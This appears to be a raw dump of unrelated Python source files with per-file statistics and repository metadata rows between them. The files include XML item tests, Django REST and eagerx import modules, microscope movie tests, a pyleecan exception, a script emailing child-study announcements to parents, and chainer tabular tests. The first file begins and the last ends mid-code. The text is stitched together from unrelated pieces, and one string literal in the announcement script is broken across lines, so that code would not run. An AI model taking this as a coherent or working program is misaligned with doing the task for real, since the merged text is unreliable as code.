<text><![CDATA[wharblegarble]]></text>
</document>"""
    item = GenericItem()
    item['title'] = 'Foobar'
    item['url'] = 'http://foobar'
    item['source'] = 'foobar'
    item['topics'] = ()
    item['text'] = 'wharblegarble'
    assert item.asXml() == expected_xml
def test_item_from_xml_with_topics(tmpdir):
    """from_xml() should round-trip every field, including the topic list."""
    xml = """<?xml version="1.0" encoding="utf-8"?>
<document>
<title>Foobar</title>
<url>http://foobar</url>
<topics>
<topic>Topic 1</topic>
<topic>Topic 2</topic>
</topics>
<source>foobar</source>
<text><![CDATA[wharblegarble]]></text>
</document>"""
    fixture_file = tmpdir.mkdir('fixtures').join('itemxml.xml')
    fixture_file.write(xml)
    item = from_xml(str(fixture_file))
    assert item['title'] == 'Foobar'
    assert item['url'] == 'http://foobar'
    assert item['source'] == 'foobar'
    assert item['text'] == 'wharblegarble'
    assert item['topics'][0] == 'Topic 1'
    assert item['topics'][1] == 'Topic 2'
def test_item_from_xml_without_topics(tmpdir):
    """from_xml() should yield an empty topics tuple for an empty element."""
    xml = """<?xml version="1.0" encoding="utf-8"?>
<document>
<title>Foobar</title>
<url>http://foobar</url>
<topics>
</topics>
<source>foobar</source>
<text><![CDATA[wharblegarble]]></text>
</document>"""
    fixture_file = tmpdir.mkdir('fixtures').join('itemxml.xml')
    fixture_file.write(xml)
    item = from_xml(str(fixture_file))
    assert item['title'] == 'Foobar'
    assert item['url'] == 'http://foobar'
    assert item['source'] == 'foobar'
    assert item['text'] == 'wharblegarble'
    assert item['topics'] == ()
| 24.135417 | 60 | 0.589555 | 288 | 2,317 | 4.65625 | 0.145833 | 0.06786 | 0.077554 | 0.04176 | 0.90604 | 0.857569 | 0.857569 | 0.857569 | 0.857569 | 0.857569 | 0 | 0.011758 | 0.19249 | 2,317 | 95 | 61 | 24.389474 | 0.704971 | 0 | 0 | 0.857143 | 0 | 0 | 0.533679 | 0.141623 | 0 | 0 | 0 | 0 | 0.168831 | 1 | 0.051948 | false | 0 | 0.025974 | 0 | 0.077922 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
abdbfe9e4c5a7426cf54e8be2d550b300bb71a94 | 506 | py | Python | src/project/rest_views/__init__.py | loganathanengrr/Django-Rest-Core | 928c2d816c0aa48453dde8642ef1b263f76ae39d | [
"MIT"
] | 1 | 2020-02-18T11:09:56.000Z | 2020-02-18T11:09:56.000Z | src/project/rest_views/__init__.py | loganathanengrr/Django-Rest-Core | 928c2d816c0aa48453dde8642ef1b263f76ae39d | [
"MIT"
] | 8 | 2020-02-11T23:20:50.000Z | 2022-03-11T23:32:18.000Z | src/project/rest_views/__init__.py | loganathanengrr/Django-Rest-Core | 928c2d816c0aa48453dde8642ef1b263f76ae39d | [
"MIT"
] | null | null | null | from .views import (
GenericAPIView,
CreateAPIView,
ListAPIView,
RetrieveAPIView,
UpdateAPIView,
DestroyAPIView,
ListCreateAPIView,
RetrieveUpdateAPIView,
RetrieveDestroyAPIView,
RetrieveUpdateDestroyAPIView,
)
from rest_framework.views import APIView
# Public API of this package: the generic view classes re-exported from
# .views above, plus rest_framework's base APIView.
__all__ = [
    'APIView',
    'GenericAPIView',
    'CreateAPIView',
    'ListAPIView',
    'RetrieveAPIView',
    'UpdateAPIView',
    'DestroyAPIView',
    'ListCreateAPIView',
    'RetrieveUpdateAPIView',
    'RetrieveDestroyAPIView',
    'RetrieveUpdateDestroyAPIView',
] | 19.461538 | 40 | 0.79249 | 31 | 506 | 12.774194 | 0.548387 | 0.055556 | 0.191919 | 0.267677 | 0.848485 | 0.848485 | 0.848485 | 0.848485 | 0.848485 | 0.848485 | 0 | 0 | 0.108696 | 506 | 26 | 41 | 19.461538 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0.345168 | 0.140039 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
abff5a57909b49b37c306a944f102e1c2ec8309a | 212 | py | Python | examples/__init__.py | eager-dev/eagerx_pybullet | a67c14399564c4c261d1d4f6512380697a043e27 | [
"Apache-2.0"
] | 1 | 2022-03-24T12:14:21.000Z | 2022-03-24T12:14:21.000Z | examples/objects/__init__.py | eager-dev/eagerx_pybullet | a67c14399564c4c261d1d4f6512380697a043e27 | [
"Apache-2.0"
] | 1 | 2022-03-29T14:33:23.000Z | 2022-03-29T14:33:23.000Z | examples/objects/__init__.py | eager-dev/eagerx_pybullet | a67c14399564c4c261d1d4f6512380697a043e27 | [
"Apache-2.0"
] | null | null | null | import examples.objects.vx300s # noqa # pylint: disable=unused-import
import examples.objects.solid # noqa # pylint: disable=unused-import
import examples.objects.camera # noqa # pylint: disable=unused-import
| 53 | 70 | 0.787736 | 27 | 212 | 6.185185 | 0.37037 | 0.251497 | 0.377246 | 0.413174 | 0.772455 | 0.598802 | 0.598802 | 0.598802 | 0 | 0 | 0 | 0.015957 | 0.113208 | 212 | 3 | 71 | 70.666667 | 0.87234 | 0.504717 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e605e501f83de5552072cd8685db03d6b8e465e2 | 2,072 | py | Python | storm_control/test/test_hal_tcp_tm.py | shiwei23/STORM6 | 669067503ebd164b575ce529fcc4a9a3f576b3d7 | [
"MIT"
] | 47 | 2015-02-11T16:05:54.000Z | 2022-03-26T14:13:12.000Z | storm_control/test/test_hal_tcp_tm.py | shiwei23/STORM6 | 669067503ebd164b575ce529fcc4a9a3f576b3d7 | [
"MIT"
] | 110 | 2015-01-30T03:53:41.000Z | 2021-11-03T15:58:44.000Z | storm_control/test/test_hal_tcp_tm.py | shiwei23/STORM6 | 669067503ebd164b575ce529fcc4a9a3f576b3d7 | [
"MIT"
] | 61 | 2015-01-09T18:31:27.000Z | 2021-12-21T13:07:51.000Z | #!/usr/bin/env python
"""
Test taking movies.
"""
from storm_control.test.hal.standardHalTest import halTest
def _take_movie_test(class_name, config_xml="none_tcp_config.xml"):
    """Run one TCP take-movie HAL test.

    Args:
        class_name: Name of the test class inside
            storm_control.test.hal.tcp_tests to execute.
        config_xml: HAL configuration file the test runs against.
    """
    halTest(config_xml=config_xml,
            class_name=class_name,
            test_module="storm_control.test.hal.tcp_tests")


def test_hal_tcp_tm_1():
    _take_movie_test("TakeMovie1")


def test_hal_tcp_tm_2():
    _take_movie_test("TakeMovie2")


def test_hal_tcp_tm_3():
    _take_movie_test("TakeMovie3")


def test_hal_tcp_tm_4():
    _take_movie_test("TakeMovie4")


def test_hal_tcp_tm_5():
    _take_movie_test("TakeMovie5")


def test_hal_tcp_tm_6():
    _take_movie_test("TakeMovie6")


def test_hal_tcp_tm_7():
    _take_movie_test("TakeMovie7")


def test_hal_tcp_tm_8():
    _take_movie_test("TakeMovie8")


def test_hal_tcp_tm_9():
    _take_movie_test("TakeMovie9")


def test_hal_tcp_tm_10():
    _take_movie_test("TakeMovie10")


def test_hal_tcp_tm_11():
    # This test additionally needs the spot counter enabled in the HAL config.
    _take_movie_test("TakeMovie11",
                     config_xml="none_tcp_config_spot_counter.xml")
| 25.268293 | 61 | 0.658784 | 281 | 2,072 | 4.41637 | 0.170819 | 0.129734 | 0.177276 | 0.183723 | 0.814666 | 0.802579 | 0.77921 | 0.77921 | 0.749396 | 0.419017 | 0 | 0.01625 | 0.227799 | 2,072 | 81 | 62 | 25.580247 | 0.759375 | 0.019305 | 0 | 0.466667 | 0 | 0 | 0.338933 | 0.189723 | 0 | 0 | 0 | 0 | 0 | 1 | 0.244444 | true | 0 | 0.022222 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
55492e5c28c92157abe70c0fe97c38f36d77a856 | 129 | py | Python | pyleecan/Methods/Machine/Conductor/__init__.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 95 | 2019-01-23T04:19:45.000Z | 2022-03-17T18:22:10.000Z | pyleecan/Methods/Machine/Conductor/__init__.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 366 | 2019-02-20T07:15:08.000Z | 2022-03-31T13:37:23.000Z | pyleecan/Methods/Machine/Conductor/__init__.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 74 | 2019-01-24T01:47:31.000Z | 2022-02-25T05:44:42.000Z | from ....Methods.Machine.LamSlotWind import Lam_WindCheckError
class CondCheckError(Lam_WindCheckError):
    """Exception raised when a Conductor check fails.

    Subclasses Lam_WindCheckError so code that catches lamination winding
    check errors also catches conductor check errors.
    """

    pass
| 16.125 | 62 | 0.728682 | 12 | 129 | 7.666667 | 0.833333 | 0.369565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.155039 | 129 | 7 | 63 | 18.428571 | 0.844037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
55625d49b92806387264348b3601b56cf5b5d860 | 19,035 | py | Python | scripts/send_current_announcements.py | kimberscott/lookit-data-processing | c975d14bc94fd148212b22aa2fc7e4d1d38ebb35 | [
"MIT"
] | null | null | null | scripts/send_current_announcements.py | kimberscott/lookit-data-processing | c975d14bc94fd148212b22aa2fc7e4d1d38ebb35 | [
"MIT"
] | 2 | 2021-04-30T20:31:29.000Z | 2021-11-15T17:46:44.000Z | scripts/send_current_announcements.py | kimberscott/lookit-data-processing | c975d14bc94fd148212b22aa2fc7e4d1d38ebb35 | [
"MIT"
] | 1 | 2018-06-20T19:48:41.000Z | 2018-06-20T19:48:41.000Z | from announcements import send_announcement_emails
# THINKING ABOUT FRIENDSHIP ONLY
# ageRangeDays = (365*3, 365*4)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentfriendshipannouncement.txt'
# expId = '410dea98-b147-402e-ac37-1ccd05e2a9e0'
# studyName = 'Thinking about Friendship'
# studyMessage = "This study investigates how children expect people to act toward one another. Your child will see a series of questions where they are told about one character who is performing a behavior, and they need to guess who is the recipient of that behavior from the options on the screen. After you participate, we will email you a $5 Amazon gift card as a thank-you (one gift card per child)!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/410dea98-b147-402e-ac37-1ccd05e2a9e0/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 3 through 7 years old? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# THINKING ABOUT FRIENDSHIP AND ZOOM STUDY
# ageRangeDays = (365*4, 365*8)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentfriendshipannouncement.txt'
# expId = '410dea98-b147-402e-ac37-1ccd05e2a9e0'
# studyName = 'Thinking about Friendship'
# studyMessage = "This study investigates how children expect people to act toward one another. Your child will see a series of questions where they are told about one character who is performing a behavior, and they need to guess who is the recipient of that behavior from the options on the screen. After you participate, we will email you a $5 Amazon gift card as a thank-you (one gift card per child)!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/410dea98-b147-402e-ac37-1ccd05e2a9e0/' target=_blank>the study</a> on Lookit!<br><br>We also wanted to let you know about an opportunity to participate in a live study for kids age 4-11, run by our colleague Sydney Levine at Harvard:<br><br>We've just started a new study looking at how children make ethical decisions. Even though it's not always obvious, we think that even very young kids can make sophisticated judgments about right and wrong. That's where you come in! We are conducting a fun study where we tell kids short stories and ask them some questions. We're trying to get as many children as possible to participate! The study takes no longer than 15 minutes to complete and will take place on the Zoom platform. <br><br>How to sign up: <br><br>Your child must be 4-11 years old. You can reserve a spot for our study by <a href='https://calendly.com/harvard-kids/30min'>signing up on the study calendar</a>. We'll send you more information once you sign up on what to expect during the study. <br><br>You can find more information about our project <a href='https://calendly.com/harvard-kids/30min'>here</a>. If you have any questions, do not hesitate to email harvard.kids.study@gmail.com!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 3 through 11 years old? We'd be grateful for any help spreading the word about these studies!<br><br><hr>"
# maxToSend = 2000
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# Let's Draw only: announcement for the drawing study, without the extra Zoom plug.
# Age range is expressed in days; this targets roughly 4- through 8-year-olds.
ageRangeDays = (365*4, 365*8)
# Log of addresses already contacted, so reruns do not email the same family twice
# (presumably — behavior lives in send_announcement_emails; confirm there).
logfilename = '/Users/kms/lookit-v2/scripts/logs/sentdrawingannouncement.txt'
# Lookit study UUID and display name used in the email subject/body.
expId = '0774c820-7912-45cd-a9f8-d8e13220e5ac'
studyName = "Let's Draw!"
# Full HTML body of the announcement email (study description + participation link).
studyMessage = "This study investigates how children think about and capture space by looking at how they draw. Your child will watch a short video about a girl named Ana performing some actions. Then your child will draw what Ana was interacting with. To participate, your child will need two blank sheets of white 8.5 x 11 paper (Letter Sized) and a regular pencil with an eraser, and will need to be on a computer (rather than a phone/tablet). After you participate, we will email you a $5 Amazon gift card as a thank-you (one gift card per child)!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/0774c820-7912-45cd-a9f8-d8e13220e5ac/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 4 through 9 years old? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# Cap on how many emails this run may send.
maxToSend = 1000
emails = 'all' # 'all'/list of emails
send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# Let's Draw + Zoom study: same drawing study, older age band (~8-10 years),
# with an extra paragraph advertising a colleague's live Zoom study.
ageRangeDays = (365*8, 365*10)
# NOTE(review): intentionally reuses the same log file as the block above so the
# two age bands share one "already contacted" list — confirm this is desired.
logfilename = '/Users/kms/lookit-v2/scripts/logs/sentdrawingannouncement.txt'
expId = '0774c820-7912-45cd-a9f8-d8e13220e5ac'
studyName = "Let's Draw!"
# NOTE(review): this string literal appears to break across two physical lines
# below; if the source really contains a raw newline there it is a syntax error —
# verify against the original file.
studyMessage = "This study investigates how children think about and capture space by looking at how they draw. Your child will watch a short video about a girl named Ana performing some actions. Then your child will draw what Ana was interacting with. To participate, your child will need two blank sheets of white 8.5 x 11 paper (Letter Sized) and a regular pencil with an eraser, and will need to be on a computer (rather than a phone/tablet). After you participate, we will email you a $5 Amazon gift card as a thank-you (one gift card per child)!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/0774c820-7912-45cd-a9f8-d8e13220e5ac/' target=_blank>the study</a> on Lookit!<br><br>We also wanted to let you know about a separate opportunity to participate in a live study for kids age 4-11, run by our colleague Sydney Levine at Harvard:<br><br>We've just started a new study looking at how children make ethical decisions. Even though it's not always obvious, we think that even very young kids can make sophisticated judgments about right and wrong. That's where you come in! We are conducting a fun study where we tell kids short stories and ask them some questions. We're trying to get as many children as possible to participate! The study takes no longer than 15 minutes to complete and will take place on the Zoom platform. <br><br>How to sign up: <br><br>Your child must be 4-11 years old. You can reserve a spot for our study by <a href='https://calendly.com/harvard-kids/30min'>signing up on the study calendar</a>. We'll send you more information once you sign up on what to expect during the study. <br><br>You can find more information about our project <a href='https://calendly.com/harvard-kids/30min'>here</a>. 
If you have any questions, do not hesitate to email harvard.kids.study@gmail.com!<br><br>Happy experimenting!<br><br>For even more ways to contribute to science from home, check out <a href='https://childrenhelpingscience.com/'>Children Helping Science</a>, a clearinghouse for online research about children and families.<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 4 through 11 years old? We'd be grateful for any help spreading the word about these studies!<br><br><hr>"
maxToSend = 1000
emails = 'all' # 'all'/list of emails
send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# WORDS AND OBJECTS
# ageRangeDays = (9 * 30, 365 + 7 * 30 + 6)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentwordsobjectsannouncement.txt'
# expId = '0574c4e1-2d0a-444d-9225-082d58d7ad7e'
# studyName = 'Words and Objects'
# studyMessage = "This study from the Stanford Language and Cognition Lab is about how babies form categories of objects. We're interested whether hearing verbal labels ('look, a doggie!') influences this learning process. your baby will see eight objects along with either beeps or words. Then, we will measure his or her looking time to objects from that new category vs. familiar objects. By examining which objects babies choose to look at during this study, we can start to uncover how babies find structure in the world around them - and how what you say to them helps! You will receive a $5 Amazon gift card to thank you for your participation.<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/0574c4e1-2d0a-444d-9225-082d58d7ad7e/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 9 - 18 months old? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# WORDS AND OBJECTS
# ageRangeDays = (9 * 30, 365 + 7 * 30 + 6)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentwordsobjectsannouncement.txt'
# expId = '0574c4e1-2d0a-444d-9225-082d58d7ad7e'
# studyName = 'Words and Objects'
# studyMessage = "This study from the Stanford Language and Cognition Lab is about how babies form categories of objects. We're interested whether hearing verbal labels ('look, a doggie!') influences this learning process. your baby will see eight objects along with either beeps or words. Then, we will measure his or her looking time to objects from that new category vs. familiar objects. By examining which objects babies choose to look at during this study, we can start to uncover how babies find structure in the world around them - and how what you say to them helps! You will receive a $5 Amazon gift card to thank you for your participation.<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/0574c4e1-2d0a-444d-9225-082d58d7ad7e/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids who are also 9 - 18 months old? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
# GEOMETRY
# ageRangeDays = (198, 229)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentgeometryannouncement.txt'
# expId = '849b547f-5199-4aa0-892d-a96262080dc8'
# studyName = 'Baby Euclid'
# studyMessage = "This study for 7-month-olds (6 1/2 to 7 1/2 months) looks at babies' perception of shapes: we're interested in whether infants pick up on features essential to Euclidean geometry, like relative lengths and angles, even across changes in a shape's size and orientation. <br><br> In this 10-minute study, your baby watches short videos of two changing streams of angles, one on each side of the screen. On one side, the angles will be changing in shape and size, and on the other side, they will be changing in size alone. We measure how long your baby looks at each of the two streams of angles to see which changes he or she finds more noticeable and interesting. <br><br> You'll earn a $5 Amazon gift card for participating (one gift card per child)! <br><br> To learn more or get started, visit <a href='https://lookit.mit.edu/studies/849b547f-5199-4aa0-892d-a96262080dc8/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
# BABY LAUGHTER
# ageRangeDays = (88, 915)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentlaughterannouncement.txt'
# expId = 'd4cbfabc-ea53-4877-bc55-c701426fd13b'
# studyName = 'Baby Laughter Games'
# studyMessage = "In this study from Caspar Addyman's group at Goldsmiths, University of London, you and your baby will perform a series of short games, including \"Peekaboo.\" We are interested in the different kinds of things that make babies laugh at different ages. Smiles and laughter transcend barriers of age, language and culture. Babies know this better than anyone -- they even began smiling in the womb!<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/d4cbfabc-ea53-4877-bc55-c701426fd13b/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids around the same age? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
# FLURPS AND ZAZZES
# ageRangeDays = (365*6, 365*8)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentflurpsannouncement_corrected.txt'
# expId = '1e9157cd-b898-4098-9429-a599720d0c0a'
# studyName = 'Flurps and Zazzes'
# studyMessage = "This study for 6- and 7-year-olds looks at how young children expect social groups to affect people's behavior. In this 15-minute study, your child will see and hear a story about two groups of kids building towers. Then we'll ask him or her to guess how the kids will behave towards others in their own group and the opposite group, and how much the kids will have in common with their group members. Your child's responses can help teach scientists about how moral and social reasoning develop. <br><br> You'll earn a $5 Amazon gift card for participating (one gift card per child)! <br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/1e9157cd-b898-4098-9429-a599720d0c0a/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. We need help spreading the word about this study, as we're not really sure how best to reach parents online. Do you have any friends with kids in the age range? Or are you up for sharing on a local parenting Facebook group or listserv? We'd be so grateful for any help!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
# POLITENESS
# ageRangeDays = (730, 1461)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentpolitenessannouncement.txt'
# expId = 'b40b6731-2fec-4df4-a12f-d38c7be3015e'
# studyName = 'Mind and Manners'
# studyMessage = "This study for 2- through 4-year-olds looks at how kids learn what it means to be polite. <br><br> In this 15-minute study, your child will listen to short stories where people make requests, and answer questions about the characters by pointing. <br><br> To learn more or get started, visit <a href='https://lookit.mit.edu/studies/b40b6731-2fec-4df4-a12f-d38c7be3015e/' target=_blank>the study</a> on Lookit!<br><br> You'll earn a $4 Amazon gift card for participating (one gift card per child)! <br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with kids around the same age? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
# PHYSICS
# ageRangeDays = (6*30, 11*30) # advertise in slightly narrower age range than need, so we don't prompt everyone to start at 4mo
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentphysicsannouncement.txt'
# expId = 'cfddb63f-12e9-4e62-abd1-47534d6c4dd2'
# studyName = 'Your baby, the physicist'
# studyMessage = "This study for 4- to 12-month-olds looks at how babies intuitively expect physical forces to work. During each study session, your baby watches pairs of short videos of physical events. On one side, something pretty normal happens: e.g., a ball rolls off a table and falls to the ground. On the other side, something surprising happens: e.g., the ball rolls off a table and falls UP! <br><br>This study will be one of the first to look in detail not just at infants' abilities collectively, but at individual differences in their expectations and styles of responding.<br><br>To better understand individual children's responses, we especially need dedicated families to complete multiple experiment sessions (up to 12). After each session, we'll email you a $5 Amazon gift card as a thank-you! (One gift card per child per session, up to 12 sessions; $5 bonus for 12th session. Child must be in the age range for the study and be visible in the consent video, so that we don't go broke paying random adults on the internet.) <br><br> Although every session helps, if you complete at least 12 sessions over the course of 2 months, we'll also be able to send you a personalized report about your child's looking patterns once video coding for the study is complete. (Sad note about how long careful science takes: this is likely to be in a few years.)<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/cfddb63f-12e9-4e62-abd1-47534d6c4dd2/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with babies around the same age? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 20
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
#
# LOOK AND LISTEN
# ageRangeDays = (120, 545)
# logfilename = '/Users/kms/lookit-v2/scripts/logs/sentintermodalannouncement.txt'
# expId = '81ac992b-ab3a-4b0b-afab-258356dee962'
# studyName = 'Look and Listen'
# studyMessage = "This study for 4- to 18-month-olds looks at how babies put together what they see and what they hear. In this five-minute study, your child watches videos of two speakers on the screen saying nonsense syllables. The sound matches just one of the speakers. We'll measure where he or she looks longer, to better understand how babies pay attention to what they see and hear when people are speaking to them. <br><br>After you participate, we'll email you a $4 Amazon gift card as a thank-you. (One gift card per child; child must be in the age range for the study.)<br><br>To learn more or get started, visit <a href='https://lookit.mit.edu/studies/81ac992b-ab3a-4b0b-afab-258356dee962/' target=_blank>the study</a> on Lookit!<br><br>Happy experimenting! <br><br>The Lookit team<br><br> P.S. Do you have any friends with babies around the same age? We'd be grateful for any help spreading the word about this study!<br><br><hr>"
# maxToSend = 200
# emails = 'all' # 'all'/list of emails
#
# send_announcement_emails(emails, ageRangeDays, logfilename, expId, studyName, studyMessage, maxToSend)
#
| 138.941606 | 2,311 | 0.76538 | 3,171 | 19,035 | 4.582151 | 0.175339 | 0.022023 | 0.0117 | 0.019683 | 0.75031 | 0.717412 | 0.709566 | 0.688713 | 0.684308 | 0.679215 | 0 | 0.04426 | 0.144208 | 19,035 | 136 | 2,312 | 139.963235 | 0.847698 | 0.781087 | 0 | 0.705882 | 0 | 0.117647 | 0.846972 | 0.075155 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
558e136769361c7096f8178d91e0395363c435cd | 12,247 | py | Python | tests/chainer_tests/dataset_tests/tabular_tests/test_from_data.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 3,705 | 2017-06-01T07:36:12.000Z | 2022-03-30T10:46:15.000Z | tests/chainer_tests/dataset_tests/tabular_tests/test_from_data.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 5,998 | 2017-06-01T06:40:17.000Z | 2022-03-08T01:42:44.000Z | tests/chainer_tests/dataset_tests/tabular_tests/test_from_data.py | zjzh/chainer | e9da1423255c58c37be9733f51b158aa9b39dc93 | [
"MIT"
] | 1,150 | 2017-06-02T03:39:46.000Z | 2022-03-29T02:29:32.000Z | import unittest
import numpy as np
import chainer
from chainer.dataset import tabular
from chainer import testing
class TestFromData(unittest.TestCase):
def test_unary_array(self):
dataset = tabular.from_data(np.arange(10))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 1)
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [1, 3])
self.assertIsInstance(output, np.ndarray)
def test_unary_array_with_key(self):
dataset = tabular.from_data(('a', np.arange(10)))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(dataset.keys, ('a',))
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [1, 3])
self.assertIsInstance(output, np.ndarray)
def test_unary_list(self):
dataset = tabular.from_data([2, 7, 1, 8, 4, 5, 9, 0, 3, 6])
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
self.assertEqual(len(dataset), 10)
self.assertEqual(len(dataset.keys), 1)
self.assertIsNone(dataset.mode)
output = dataset.slice[[1, 3]].fetch()
np.testing.assert_equal(output, [7, 8])
self.assertIsInstance(output, list)
def test_unary_list_with_key(self):
dataset = tabular.from_data(('a', [2, 7, 1, 8, 4, 5, 9, 0, 3, 6]))
self.assertIsInstance(dataset, chainer.dataset.TabularDataset)
